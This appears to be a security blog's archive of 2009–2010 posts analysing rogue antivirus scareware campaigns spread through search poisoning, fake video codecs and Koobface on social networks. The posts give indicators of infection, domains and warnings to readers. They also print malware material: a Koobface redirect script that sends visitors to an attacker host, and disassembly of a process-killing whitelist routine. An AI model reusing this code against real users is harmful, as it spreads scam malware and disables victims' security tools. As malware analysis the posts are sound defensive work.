The magnitude 6.4 earthquake does not only rattle Taiwan but even the internet users as well. It is another opportunity for Malware writers to poison returned results from searches about this disaster. It now became a constant attack every time there is major news, earthquake, tsunami or any other event that would call the attention of the people. It seems now it guarantees every news has equivalent virus site. This abused infection vector by fake AVs serve as a warning.
Once unsuspecting users click the malicious site, it will be redirected to fake AV online scan page and shows different annoying pop-ups warning the user that his system is infected and vulnerable to attacks. This might lead the user to download and install the Rogue Antispyware such as Security Antivirus. They have used multiple malicious domain names to prevent them to be easily identified. This infection routine is the same with other reports as you might have read from the previous blogs. But despite of awareness campaign, there are still an increasing number of victims fallen to this scam and worst, lost their money.
I have seen few malicious searched results which start with comma (,) and dash (-) such as above screen shot and from this blog. It is advisable to prevent from visiting these kinds of searched results. Internet users should be very careful in picking which sites to read the latest news. It is much better to read from reputable sources.
Showing posts with label scareware. Show all posts
Showing posts with label scareware. Show all posts
Friday, March 5, 2010
Monday, March 1, 2010
Chilling rogues on Chile
Shortly after the Haiti earthquake incident, the world is rocked again with the news of the Chile earthquake. And with the wave of searches on google about the Chile earthquake, malware authors have once again taken this opportunity to proliferate rogue antipsyware.
Searches returned from google are generally not suspect, especially if they bear URLs that seem normal. But one particular site (bostonmassduilawyer.com/ypi.php?...chile-earthquake-videos) when accessed will redirect you to http://188.124.5.159/index.html.

This site will display a fake system scan using an HTML page, and clicking anywhere on the page will prompt the user to download the INST.EXE file (SecurityTool fake AV). It also displays annoying popups that feeds FUD to users (FUD: Fear, Uncertainty, Doubt).


INST.EXE is just another Security Tool installer. Shortly after executing, it will display a fake scan showing some bogus results. Attempting to activate it will lead you to a page where they offer you a 2 year software license of $49.95, and a lifetime software license of $79.95. Looks tempting, but it's just a ploy to part you with your money. In truth, it's one hell of a hefty price to pay for such a useless and annoying scareware.



Searches returned from google are generally not suspect, especially if they bear URLs that seem normal. But one particular site (bostonmassduilawyer.com/ypi.php?...chile-earthquake-videos) when accessed will redirect you to http://188.124.5.159/index.html.
This site will display a fake system scan using an HTML page, and clicking anywhere on the page will prompt the user to download the INST.EXE file (SecurityTool fake AV). It also displays annoying popups that feeds FUD to users (FUD: Fear, Uncertainty, Doubt).
INST.EXE is just another Security Tool installer. Shortly after executing, it will display a fake scan showing some bogus results. Attempting to activate it will lead you to a page where they offer you a 2 year software license of $49.95, and a lifetime software license of $79.95. Looks tempting, but it's just a ploy to part you with your money. In truth, it's one hell of a hefty price to pay for such a useless and annoying scareware.
Labels:
rogue,
Rogue Anti Spyware,
rogue av,
scareware,
seo,
seo poisoning
Friday, February 19, 2010
Porntube Anyone? Bonus Scareware!

Porn clips are everywhere! But then again, rogue antivirus software are everywhere too.
The fake video codec tactic targets unsuspecting users wanting to view the adult videos purportedly being hosted in the malicious website:
hxxp://porntube2000.com
Clicking on one of the thumbnails presents a video player window with the error message "Video ActiveX Object Error". The message asks the user install a new version of Video ActiveX Object which is actually an installer for Security Tool posing as a fake video codec.
This page also shows the following messageboxes when the user tries to move away from the malicious website and basically does not allow the user to select cancel.
Tuesday, November 3, 2009
MaCatte scareware fools users by masquerading as McAfee
MaCatte Antivirus is a rogue av that attempts to impersonate McAfee scanners in order to scam users.
This scareware has been seen to be using a bogus My Computer online scan similar to ones we've seen here, here and here.
The online scan can be seen on this url:
hxxp://proscan5.info/25/26-088wLzQzL1EzL==The downloader being served from this url is time-sensitive and will not work after a period of time. A session ID of some sort is embedded on the binary executable itself. After such time has elapsed, the downloader tells the user to contact MaCatte Antivirus support people. This prevents reverse-engineers from replicating the infection and gathering samples for analysis.
Presence of these files / folders would signal infection from this scareware:
C:\Documents and Settings\All Users\Application Data\msca
C:\Documents and Settings\All Users\Application Data\msca\MaCatte.ico
C:\Documents and Settings\All Users\Application Data\msca\mcull.exe
C:\Documents and Settings\All Users\Application Data\msca\msc.exe
C:\Documents and Settings\All Users\Application Data\msca\Viruses.dat
C:\Documents and Settings\All Users\Application Data\Microsoft\Media\WPtect.dll
C:\Documents and Settings\All Users\Desktop\MaCatte.lnk
C:\Documents and Settings\All Users\Start Menu\Programs\MaCatte
C:\Documents and Settings\All Users\Start Menu\Programs\MaCatte\MaCatte.lnkUnsuspecting users are set back from their hard-earned money by a hefty $99.
Stay away from these rogue apps.
Labels:
fake app,
fake av,
MaCatte,
macatte.com,
McAfee,
proscan5.info,
rogue app,
rogue av,
scareware,
security
Tuesday, October 13, 2009
Winifighter Clone: TrustFighter
Another scareware has been spotted in the wild and it calls itself TrustFighter. This is a recent addition to the Winifighter family of scareware.
Same as other members of this family of scareware, as in a previous post, TrustFighter creates heaps of junk binary files in the %systemroot% and %system% directories.
Sample junk files are the following:
%systemroot%\51c0vzr24975.dll
%systemroot%\51cbthreatz1991.ocx
%systemroot%\524699py69fz.bin
%systemroot%\525z1vi9us4e4.cpl
%systemroot%\5294viz115.exe
%systemroot%\5eddaddwar9167z.dll
%systemroot%\5ezast95l495.dll
%systemroot%\5ezdaddware2359.cpl
%systemroot%\5z09s9yware545.cpl
%systemroot%\5z56th5eat19149.bin
%systemroot%\5z85thief22759.cpl
%systemroot%\5z99addware2835.ocx
%systemroot%\5z9bba5kdoor525.dll
%systemroot%\5z9cth5ef13559.cpl
%systemroot%\5zfdaddware950.bin
%systemroot%\5zfesparse709.exe
%systemroot%\6169th5zf99.ocx
%systemroot%\6210spywa5e192z.ocx
%system%\1905szea51146.cpl
%system%\190979iru57z7.ocx
%system%\190cszywa591879.exe
%system%\19105vizus1c.bin
%system%\19179virusz65.ocx
%system%\1930thief97z5.cpl
%system%\19559spamboz6bb.ocx
%system%\1958stezl2595.cpl
%system%\195b5hreat39894z.exe
%system%\19645worm7zd.exe
%system%\1969spz715.bin
%system%\1977zhacktool54d.cpl
%system%\19792troz5aa.bin
%system%\1987th5z92904.cplHere are some domains participating in this campain:
securityannounce(dot)com
securityadjust(dot)com
bestmalwaredetect(dot)com
pcprotectzone(dot)com
trustfighter(dot)comUnsuspecting users get set back by $49.95 from their hard-earned money.
Tuesday, September 22, 2009
Another Shameless SEO based on Atlanta Flooding
Users Googling "Atlanta flood pictures" receive a yet another SEO attack, using a possibly compromised legitimate Australian website hosting restaurants in the famous Bondi area.
Here's a screenshot of a google search result:

A Fiddler capture shows us the redirections:

So we go from
An installer named Soft_207.exe will be presented for download, which is a variant of the Total Security family of Fake AVs.
At the moment, the following domains have been observed to have been involved in this attack:
These domains resolve to the following IP addresses:
But knowing the trend in scareware, there could be heaps more domains being created as we speak.
Here's a screenshot of a google search result:
A Fiddler capture shows us the redirections:
So we go from
hxxp://idrb.com/pdf_files/atlanta-flood-pictures.html
>hxxp://06d.ru/t.php
>>hxxp://read-cnn2.com/?pid=207&sid=de9f8f
>>>hxxp://winfixscanner7.com/scan1/?pid=207&engine=pHTyzjTyMzEyOS44Mi4xOTAmdGltZT0xMjUuNgAMPAVNAn installer named Soft_207.exe will be presented for download, which is a variant of the Total Security family of Fake AVs.
At the moment, the following domains have been observed to have been involved in this attack:
winfixscanner7(dot)com
15scanner(dot)comThese domains resolve to the following IP addresses:
89.47.237.55
89.248.174.61
213.163.89.60But knowing the trend in scareware, there could be heaps more domains being created as we speak.
Thursday, August 27, 2009
Porn site distributes scareware
Another website has recently been spotted to be serving up malware in the guise of fake video codecs.
This one praises itself as "The Best Nude Celebrity Movie Site"

But in order to watch the any video, we would need to download and install their "Certified ActiveX video codec (VAC codec) use to protect content Copyrights"
The fake fake codec can be downloaded here:
One of the components used in this attack is an onfuscated javascript file that can be found in the %temp% folder.

This script translates to:

This script downloads:
Which then gives us scareware Safety Center:

Beware of fake video codecs!
This one praises itself as "The Best Nude Celebrity Movie Site"
hxxp://alyssafan.net/1.htmlBut in order to watch the any video, we would need to download and install their "Certified ActiveX video codec (VAC codec) use to protect content Copyrights"
The fake fake codec can be downloaded here:
hxxp://alyssafan.net/Mediacodec_v4.8.exeOne of the components used in this attack is an onfuscated javascript file that can be found in the %temp% folder.
This script translates to:
This script downloads:
hxxp://ue4x08f5myqdl.cn/u3.exeWhich then gives us scareware Safety Center:
Beware of fake video codecs!
Friday, August 21, 2009
Scareware asking for ransom: System Security
Scareware is BIG business. They use heaps of scare tactics in order to convince unsuspecting users into buying rogue applications. But here's one that does a bit more than just scaring.
System Security terminates almost all running processes. This basically prevents us from using our computers. More importantly, this hinders execution of tools necessary to investigate the infection and aid in removal of this rogue app.
Back in the day, in order to evade detection and removal, malware writers have targeted security-related applications. They have a black list of applications including (but not limited to) the following:
avast.exe
avp.exe
cmd.exe
icesword.exe
kav.exe
regedit.exe
taskmgr.exeBut now they block even the most harmless Windows applications such as calc.exe and notepad.exe. But not all applications should be terminated, because that basically means no Windows. No Windows means no profit so the bad guys need basic Windows functionality. Which tells us that they have probably stopped using blacklisting and shifted to whitelisting instead. They now have a list of applications that they would allow to be executed in the system.
Here's part of some disassembly taken from a sample of System Security, showing us evidence of whitelisting:
Rogue app takes a snapshot of all the processes in the system:
.rsrc:140B4B4F push edi
.rsrc:140B4B50 push 2
.rsrc:140B4B52 call CreateToolhelp32Snapshot
.rsrc:140B4B57 mov [ebp+hObject], eax
...
.rsrc:140B4B79 push ecx
.rsrc:140B4B7A push eax
.rsrc:140B4B7B mov [ebp+var_64C], 22Ch
.rsrc:140B4B85 call Process32FirstW
...
.rsrc:140B4BAB push [ebp+dwProcessId] ; dwProcessId
.rsrc:140B4BB1 push 0 ; bInheritHandle
.rsrc:140B4BB3 push 1FFFFFh ; dwDesiredAccess
.rsrc:140B4BB8 call ds:OpenProcessIt then terminates the processes not found in the white list:
.rsrc:140B4C00 push 0FFFFFFFFh ; uExitCode
.rsrc:140B4C02 push edi ; hProcess
.rsrc:140B4C03 call ebx ; TerminateProcessand displays this message as a notification in the system tray:
.rsrc:14039998 aApplicationCan: ; DATA XREF: sub_140B4ADD+16A
.rsrc:14039998 unicode 0,
.rsrc:14039998 unicode 0,
.rsrc:14039998 dw 0Ah
.rsrc:14039998 unicode 0, ,0
.rsrc:14039A5E align 10h
.rsrc:14039A60 aWarning: ; DATA XREF: .rsrc:140104BF
.rsrc:14039A60 ; sub_140B4ADD+1DB ...
.rsrc:14039A60 unicode 0, ,0
.rsrc:14039A72 align 4It then resumes processing the snapshot created earlier and the cycle continues:
.rsrc:140B4CDF lea eax, [ebp+var_64C]
.rsrc:140B4CE5 push eax
.rsrc:140B4CE6 push [ebp+hObject]
.rsrc:140B4CEC call Process32NextWHere's the list of applications that the scareware allows:
.rsrc:14046A48 off_14046A48 dd offset aAlg_exe ; DATA XREF: sub_140B49CF+26
.rsrc:14046A48 ; "alg.exe"
.rsrc:14046A4C dd offset aCsrss_exe ; "csrss.exe"
.rsrc:14046A50 dd offset aCtfmon_exe ; "ctfmon.exe"
.rsrc:14046A54 dd offset aExplorer_exe ; "explorer.exe"
.rsrc:14046A58 dd offset aServices_exe ; "services.exe"
.rsrc:14046A5C dd offset aSlsvc_exe ; "slsvc.exe"
.rsrc:14046A60 dd offset aSmss_exe ; "smss.exe"
.rsrc:14046A64 dd offset aSpoolsv_exe ; "spoolsv.exe"
.rsrc:14046A68 dd offset aSvchost_exe ; "svchost.exe"
.rsrc:14046A6C dd offset aSystem ; "system"
.rsrc:14046A70 dd offset aIexplore_exe ; "iexplore.exe"
.rsrc:14046A74 dd offset aLsass_exe ; "lsass.exe"
.rsrc:14046A78 dd offset aLsm_exe ; "lsm.exe"
.rsrc:14046A7C dd offset aNvsvc_exe ; "nvsvc.exe"
.rsrc:14046A80 dd offset aWininit_exe ; "wininit.exe"
.rsrc:14046A84 dd offset aWinlogon_exe ; "winlogon.exe"
.rsrc:14046A88 dd offset aWscntfy_exe ; "wscntfy.exe"
.rsrc:14046A8C dd offset aWuauclt_exe ; "wuauclt.exe"As we can see, System Security is more than just scareware. You won't be able to properly use your computer unless you buy the rogue app. Sounds more like ransomeware to me.
But, now that we know that it uses whitelisting, we can do a little work around and bypass this technique. We can rename a copy of the tools that we need to run as one of the whitelisted applications and voila! We've already taken one step into regaining full use of our infected computer.
Labels:
blacklist,
Facebook,
fake,
fake alert,
fake av,
koobface,
Malicious Intent,
ransomware,
rogue,
rogue av,
scareware,
security,
System Security,
terminateprocess,
whitelist
Thursday, August 20, 2009
Rogue AV Clone: Windows Protection Suite
Another scareware has been spotted and it calls itself Windows Protection Suite.
You can get Windows Protection Suite from one of these urls:
hxxp://searchscanner.net/?p=WKmimHVlbXCHjsbIo22EfYCIt1POo22YXZmK0qR0qay9sYmbm5h2lpd9fXCHodjSbpRelWZsmGGZYWPMU9jSzKKsl3OWh9esb2VraWhpbWyWX5aMlJNq
hxxp://linewebsearch.com/?p=WKmimHVlbXCHjsbIo22EfYCIt1POo22YXZmK0qR0qay9sYmbm5h2lpd9fXCHodjSbpRelWZsmGGZYWPMU9jSzKKsl3OWh9esb2VraWhpbWyWX5aMlJNq
hxxp://linewebsearch.com/?p=WKmimHVlaGuHjsbIo22Eh4uLt1POo22eU9LXoKitiJ%2FY1cRflJ2dcZqTgX6YU9janW1eZWpslGGbZmGXkonZ0Zqop5uikomtpXFqZmxtbWmaYZyfV5OQcQ%3D%3D
hxxp://linewebsearch.com/build8_102.php?cmd=getFile&counter=1&p=WKmimHVlaGuHjsbIo22EfYCLt1POo22eU9LXoKitiJ/Y1cRflJ2dcZqTgX6ZU9janW1jZWJsmGGXZGSeXonZ0Zqop5uikomtpXFqZmxsa3CaXpmbV5OQcQ==
hxxp://guardinfo.net/?p=WKmimHVlbm2HjsbIo22EfYCIt1POo22cU9LXoKith6Swz9KwoFqbnZxxmpinc4rapZxql2OemI6WaWeZY5WK2J%2Bgo6vKnpRfpqd2ZWppaHCUXpeaaFaQl28%3DIt uses the same tactic as seen on earlier posts here and here where the website claims to scan the unsuspecting user's computer, detects heaps of infections, and offers a bogus solution.
Looking at the installed scareware we find out that Windows Protection Suite is nothing but a clone of Windows Security Suite.
Even their websites are clones:
hxxp://windowsprotectionsuite.com
hxxp://windowssecuritysuite.com
Thursday, August 13, 2009
Social engineering trick leads to Rogue AV: MacroVirus
I was reading a blog about a Rogue AV then I noticed a suspicious comment on it:

It the user was recommending an antispyware program and gave us the following url:
Following the link, tinyurl does its magic and we are directed to:

If we believe everything we see and hear, we'll be downloading and installing a scareware:

Here we can see that the bad guys are clearly taking advantage of the url shortening service from tinyurl.com.
Also, you might notice, there's a striking resemblance between the following:
and
This is probably giving us a hint as to how the bad guys get paid.
If you got this scareware, remove it immediately.
It the user was recommending an antispyware program and gave us the following url:
www(dot)tinyurl(dot)com/qlft9cFollowing the link, tinyurl does its magic and we are directed to:
hxxp://macrovirus(dot)com/?hop=starbasiIf we believe everything we see and hear, we'll be downloading and installing a scareware:
Here we can see that the bad guys are clearly taking advantage of the url shortening service from tinyurl.com.
Also, you might notice, there's a striking resemblance between the following:
bassey edetand
hxxp://macrovirus(dot)com/?hop=starbasiThis is probably giving us a hint as to how the bad guys get paid.
If you got this scareware, remove it immediately.
Labels:
fake alert,
fake av,
macrovirus,
qlft9c,
rogue app,
Rogue Apps,
rogue av,
scareware,
security,
starbasi,
tinyurl
Tuesday, August 11, 2009
Rogue AV: Winifighter
We've talked about digital clutter on a previous post.
But this one's a real bugger. Winifighter creates heaps of junk binary files in the %systemroot% and %system% directories. The filenames, the contents, and filesize are all random. The names, however, contains bits and pieces taken from malware names such as the following:
backdoor
not a virus
spy
trojan
virus
wormThis one also, spoofs the Windows Security Center to give itself that authentic feel and advises unsuspecting users to register Winifighter.
Ad of course we also have those ever so genuinely adorable warning messages:
As always, I advise everyone to steer clear of these Rogue AVs.
Labels:
fake alert,
fake av,
rogue app,
Rogue Apps,
rogue av,
scareware,
Winifighter
Monday, August 10, 2009
Facebook: Rogue AV Farm?
There has been enormous movement related to koobface lately and it has been mostly driven by social networking websites such as Facebook, Tagged, Myspace, Twitter, and many others.
One social networking website that probably tops the list of sites used as attack vectors is Facebook.
Here's a screenshot of a spoofed Facebook website:

We are presented by a fake codec alert and unsuspecting users usually download and install the Koobface malware:

We have seen koobface being hosted on
The strings are random, and so are the names of the javascript files being executed.
Here's what the javascript file has to offer:
Since the domain
One of the payloads of koobface is downloading other malware, and currently it is serving the fake AV called System Security.

A few weeks prior to today, there has been a lot of buzz about Facebook's Farm Town app serving up Rogue AVs. And recently Facebook is once-again associated with Rogue AVs. Clearly, the bad guys behind these attacks are tyring to make quick bucks by promoting scareware. And of course by using techniques such as Social Engineering , malware and scareware spread rather quickly and easily, because attackers can hide behind the names of even the people we trust.
Take extreme care when viewing emails, tweets, comments or posts. Even if they came from people we know.
One social networking website that probably tops the list of sites used as attack vectors is Facebook.
Here's a screenshot of a spoofed Facebook website:
We are presented by a fake codec alert and unsuspecting users usually download and install the Koobface malware:
We have seen koobface being hosted on
kukuruku-290709(dot)com, but thanks to the all good guys out there this site has been taken down. But the bad guys have responded and are now using legitimate domains and redirections to serve koobface. We have seen a small patch of code on websites used in the redirection:wrttnsvqnayay qrqgtlzac
script src ="4fc . js" // edited
qsmypwqmoj bbaspbrqThe strings are random, and so are the names of the javascript files being executed.
Here's what the javascript file has to offer:
// KROTEG
var abc1 = 'http://kukuruku-290709.com/go/';
var abc2 = 'http://kukuruku-290709.com/go/';
var ss = '' + location.search;
if ((location.search).length>0) abc = abc1; else abc = abc2;
var redirects = [
['facebook.com', abc+'fb.php'],
['tagged.com', abc+'tg.php'],
['friendster.com',abc+'fr.php'],
['myspace.com', abc+'ms.php'],
['msplinks.com', abc+'ms.php'],
['myyearbook.com',abc+'yb.php'],
['fubar.com', abc+'fu.php'],
['twitter.com', abc+'tw.php'],
['hi5.com', abc+'hi5.php'],
['bebo.com', abc+'be.php']
];
var s = '' + document.referrer, r = false;
for (var i = 0; i 0) redir=redir+'&domain='+location.host; else redir=redir+'?domain='+location.host;
location.href = redir;
r = true;
break;
}
}
if (!r) location.href = abc+'index.php'+ location.search;Since the domain
kukuruku-290709(dot)com has been brought down already, we'll soon most likely see new ones emerge to host koobface.One of the payloads of koobface is downloading other malware, and currently it is serving the fake AV called System Security.
A few weeks prior to today, there has been a lot of buzz about Facebook's Farm Town app serving up Rogue AVs. And recently Facebook is once-again associated with Rogue AVs. Clearly, the bad guys behind these attacks are tyring to make quick bucks by promoting scareware. And of course by using techniques such as Social Engineering , malware and scareware spread rather quickly and easily, because attackers can hide behind the names of even the people we trust.
Take extreme care when viewing emails, tweets, comments or posts. Even if they came from people we know.
Thursday, August 6, 2009
Rogue AV: Antivirus Plus
Here's another Rogue AV out there, and it's being served by more than one domain:

Here's a list of some of the domains used to host this Rogue AV:

Stay away from these rogue domains and block them if you have any means of doing so.
Here's a list of some of the domains used to host this Rogue AV:
addedantiviruslive(dot)com
addedantivirusonline(dot)com
addedantivirusstore(dot)com
easyaddedantivirus(dot)com
freeantivirusplus09(dot)com
goodantivirusplus(dot)com
i-antivirusplus(dot)com
internetantivirusplus(dot)com
mybestantivirusplus(dot)com
myplusantiviruspro(dot)com
nextantivirusplus(dot)com
realantivirusplus09(dot)com
realbestantivirusplus(dot)com
yesantivirusplus(dot)comStay away from these rogue domains and block them if you have any means of doing so.
Labels:
Antivirus Plus,
fake alert,
fake av,
rogue app,
Rogue Apps,
rogue av,
scareware
Saturday, July 25, 2009
Heaps of threats found on my C: and D: drives! Oh wait, I'm not runningWindows
I have recently been working on Rogue AVs and there's one that made me chuckle.
Rogue website: zocleaner(dot)com

Visiting the rogue website warned me that my computer is infected and then it started scanning my computer as shown above. The image above was being displayed on my browser and was telling me that it had found heaps of threats already!
Clearly the rogue site was trying to fool me into thinking that my computer is infected. Duh! I wasn't even running Windows!
Downloading and installing the rogue application on a test machine gave me the usual outrageous scan results:

I advise everyone to be vigilant. People behind these rogue apps are out there to rip us off.
Rogue website: zocleaner(dot)com
Visiting the rogue website warned me that my computer is infected and then it started scanning my computer as shown above. The image above was being displayed on my browser and was telling me that it had found heaps of threats already!
Clearly the rogue site was trying to fool me into thinking that my computer is infected. Duh! I wasn't even running Windows!
Downloading and installing the rogue application on a test machine gave me the usual outrageous scan results:
I advise everyone to be vigilant. People behind these rogue apps are out there to rip us off.
Labels:
fake alert,
fake av,
rogue app,
Rogue Apps,
rogue av,
scareware
Subscribe to:
Posts (Atom)









